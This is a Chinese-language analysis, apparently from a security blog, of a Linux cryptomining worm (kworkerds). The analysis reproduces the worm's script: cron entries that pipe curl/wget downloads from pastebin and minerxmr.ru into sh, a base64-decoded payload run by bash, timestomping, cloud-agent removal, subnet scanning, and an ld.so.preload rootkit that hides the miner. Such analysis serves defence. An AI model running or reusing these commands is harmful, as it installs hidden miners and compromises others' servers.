2018-12-18 17:06:1915446人阅读
0x00 事件
业务方报告了挖矿木马,并提供了样本,借助这个机会分析一波。
业务方主要提供了两个二进制程序(linux的)usr_sbin_netdns和usr_local_lib_libdns.so
0x01 攻击脚本分析
1、首先先去云端检查下更新
curl -fsSL --connect-timeout 120 https://pastebin.com/raw/SSCy7mY7
若云端返回是update,则执行echocron函数进行升级
这里木马是通过各种方式添加crontab,主要如下方式:
方式1 直接写到/etc/cron.d目录下,并用root或者apache这种文件方式迷惑
echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw /1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc /cron.d/root
echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw /1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc /cron.d/apache
方式2 写到/var/spool/cron目录下
echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/root echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron /crontabs/root
保证是root用户启动的
方式3 分别写入cron.hour cron.daily cron.monthly三个目录下
mkdir -p /etc/cron.hourly
curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc
/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
if [ ! -f "/etc/cron.hourly/oanacroner" ]; then
wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.hourly/oanacroner
&& chmod 755 /etc/cron.hourly/oanacroner
fi
mkdir -p /etc/cron.daily
curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc /cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
if [ ! -f "/etc/cron.daily/oanacroner" ]; then
wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
fi
mkdir -p /etc/cron.monthly
curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc /cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
if [ ! -f "/etc/cron.monthly/oanacroner" ]; then
wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.monthly/oanacroner
&& chmod 755 /etc/cron.monthly/oanacroner
fi
之后对修改过的文件进行时间修改,将创建的时间均修改为/bin/sh的时间(太鸡贼)
touch -acmr /bin/sh /var/spool/cron/root touch -acmr /bin/sh /var/spool/cron/crontabs/root touch -acmr /bin/sh /etc/cron.d/apache touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/oanacroner touch -acmr /bin/sh /etc/cron.daily/oanacroner touch -acmr /bin/sh /etc/cron.monthly/oanacroner
2、卸载云监控agent、蠕虫感染
if [ ! -f "/tmp/.uninstall" ]; then
uninstall
fi
if [ ! -f "/tmp/.tables" ]; then
tables
fi
if [ ! -f "/tmp/.pythonj" ]; then
rm -rf /tmp/.pythoni
python
fi
1. uninstall 是负责干掉阿里云和腾讯云的各种监控(这里没有百度云,尴尬)
2. tables是负责配置iptables的转发,将6379端口配置为仅为本机访问
3. python则是通过python请求云端下载python脚本
python脚本功能如下:
扫描本机IP所在C网段(首先通过ident.me获取本机的公网ip,如果失败,则获取内网ip)
def get_ip_list():
try:
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
conn.request(method='GET', url='/', )
result = conn.getresponse()
ip = result.read()
ips = findall(r'\d+.\d+.\d+.', ip)[0]
for i in range(1, 256):
IP_LIST.append(ips + (str(i)))
except Exception:
ip = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep - v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
ips = findall(r'\d+.\d+.\d+.', ip)[0]
for i in range(1, 256):
IP_LIST.append(ips + (str(i)))
pass
对C网段所有机器进行攻击
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
Redis未授权访问(6379)
之后,木马进行了如下操作:
kills函数负责干掉同行,其他挖矿进程(这里可以提取其他挖矿进程的特征)
downloadrun下载了一个挖矿进程(名称为kworkerds)
curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/y /1540638957x-1566660823.jpg
3、下载更新进程httpdns和进程隐藏so库,隐藏挖矿程序
脚本执行了system函数下载一个httpdns脚本,并放入crontab中继续执行(此时挖矿程序已经运行起来了)
(curl -fsSL https://pastebin.com/raw/rjPGgXQE || wget -q -O-https://pastebin.com/raw/rjPGgXQE)|base64 -d|/bin/bash
还是一个shell脚本,作用还是写入crontab,下载执行挖矿程序,这里有一段代码如下:
function init() {
if [ ! -f "/usr/sbin/netdns" ]; then
curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/x /1539937106x-1566688371.jpg -o /usr/sbin/netdns && chmod 777 /usr/sbin /netdns
if [ ! -f "/usr/sbin/netdns" ]; then
wget https://master.minerxmr.ru/x/1539581981x-1404817844.jpg - O /usr/sbin/netdns && chmod 777 /usr/sbin/netdns
fi
fi
if [ ! -f "/etc/init.d/netdns" ]; then
curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/x /1539775552x-1566688526.jpg -o /etc/init.d/netdns && chmod 777 /etc/init.d /netdns
if [ ! -f "/etc/init.d/netdns" ]; then
wget https://master.minerxmr.ru/x/1539775552x-1566688526.jpg - O /etc/init.d/netdns && chmod 777 /etc/init.d/netdns
fi
fi
chkconfig --add netdns
}
下载了另一个二进制程序netdns和so库,netdns就是我们之前分析的业务线提供的usr_sbin_netdns(用来定期更新攻击脚本和心跳维持)
最后脚本执行了top函数,目的是下载一个libdns.so,并使用如下命令去替换/etc/ld.so.preload
echo /usr/local/lib/libdns.so > /etc/ld.so.preload touch -acmr /bin/sh /etc/ld.so.preload touch -acmr /bin/sh /usr/local/lib/libdns.so
这样在动态连接的时候会加载libdns.so
0x02 usr_sbin_netdns分析
拖入ida里发现是加过壳的
upx壳,linux下的,应该是压缩壳,在linux下apt-get install upx,upx -D一键脱壳
脱壳后执行了一system函数,system函数是自己重写的,具体其他功能待后续详细分析,其中是执行了如下的命令下载攻击脚本
0x03 挖矿进程kworkerds分析
同样是upx加壳,脱壳后看到矿池地址和钱包地址
0x04 libdns.so分析
目的是hook了readdir和readdir64两个函数,因为top和ps会调用这两个函数去相应的进程文件下去查看
函数的目的是找到读取的目录是否是/proc
get_process_name是查询进程的相关状态/proc/id/stat,并且根据该文件获取进程名
若进程名为kworkerds,则不进行返回,做到top和ps都无法查询到进程名
最终还原文件之后会看到进程名kworkerds,几乎把cpu打满了
0x05 攻击思路总结
1. 利用两个代码执行cve植入攻击脚本1;
2. 攻击脚本1下载攻击脚本2,并设置crontab,干掉云监控和同行、并进行内网扫描,继续蠕虫感染;
3. 下载挖矿程序kworkerds开始挖矿;
4. 下载httpdns二进制文件和进程隐藏so库,隐藏挖矿进程,让top命令和ps找不到,而httpdns则是定期下载新的攻击脚本1进行轮训检测和心跳维持
本文由百度安全合作作者(ID:三胖子日了猫了)提供,如需转载需注明出处及本文链接